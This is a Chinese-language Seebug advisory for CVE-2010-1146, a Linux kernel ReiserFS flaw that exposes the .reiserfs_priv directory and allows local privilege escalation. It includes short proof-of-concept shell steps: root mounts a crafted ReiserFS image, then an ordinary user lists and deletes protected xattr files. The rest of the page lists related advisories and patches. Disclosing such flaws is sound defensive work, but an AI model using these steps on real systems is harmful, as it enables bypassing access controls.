Lucene search
RootSSV:19436HistoryApr 12, 2010 - 12:00 a.m.
Linux Kernel ReiserFS文件系统实现绕过安全限制漏洞
2010-04-1200:00:00
Root
www.seebug.org
15
0.0004 Low
EPSS
Percentile
0.4%
BUGTRAQ ID: 39344
CVE ID: CVE-2010-1146
Linux Kernel是开放源码操作系统Linux所使用的内核。
Linux Kernel的ReiserFS文件系统实现没有正确地限制对.reiserfs_priv目录的访问,本地用户可以通过修改ACL或扩展属性获得 root权限提升。成功攻击要求系统正在使用ReiserFS文件系统。
Linux kernel 2.6.x
厂商补丁:
Linux
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
以root:
truncate --size 64M test.reiserfs
mkreiserfs -f test.reiserfs
mkdir /mnt/test
mount -o loop,rw,user_xattr test.reiserfs /mnt/test
setfattr -n user.test -v myvalue /mnt/test
以普通用户:
ls -l /mnt/test/.reiserfs_priv/xattrs/2.0
rm /mnt/test/.reiserfs_priv/xattrs/2.0/user.test # Whoops
Related
packetstorm
packetstorm
Linux Kernel 2.6.34-rc3 ReiserFS xattr Privilege Escalation
2010-04-10 00:00:00
nessus
nessus
Fedora 12 : kernel-2.6.32.12-115.fc12 (2010-7779)
2010-07-01 00:00:00
Ubuntu 6.06 LTS / 8.04 LTS / 9.04 / 9.10 / 10.04 LTS : linux, linux-source-2.6.15 vulnerabilities (USN-947-1)
2010-06-04 00:00:00
Ubuntu 10.04 LTS : linux regression (USN-947-2)
2010-06-04 00:00:00
ubuntucve
ubuntucve
CVE-2010-1146
2010-04-12 00:00:00
cve
cve
CVE-2010-1146
2010-04-12 18:30:00
prion
prion
Design/Logic Flaw
2010-04-12 18:30:00
openvas
openvas
Fedora Update for kernel FEDORA-2010-7779
2010-05-28 00:00:00
Fedora Update for kernel FEDORA-2010-7779
2010-05-28 00:00:00
Fedora Update for kernel FEDORA-2010-9209
2010-06-18 00:00:00
fedora
fedora
[SECURITY] Fedora 12 Update: kernel-2.6.32.12-115.fc12
2010-05-18 21:59:07
[SECURITY] Fedora 12 Update: kernel-2.6.32.14-127.fc12
2010-06-14 17:13:44
[SECURITY] Fedora 12 Update: kernel-2.6.32.16-141.fc12
2010-07-13 07:49:26
kitploit
kitploit
securityvulns
securityvulns
ubuntu
ubuntu
Linux kernel regression
2010-06-04 00:00:00
Linux kernel vulnerabilities
2010-06-03 00:00:00
suse
suse
local privilege escalation in kernel
2010-09-23 16:37:26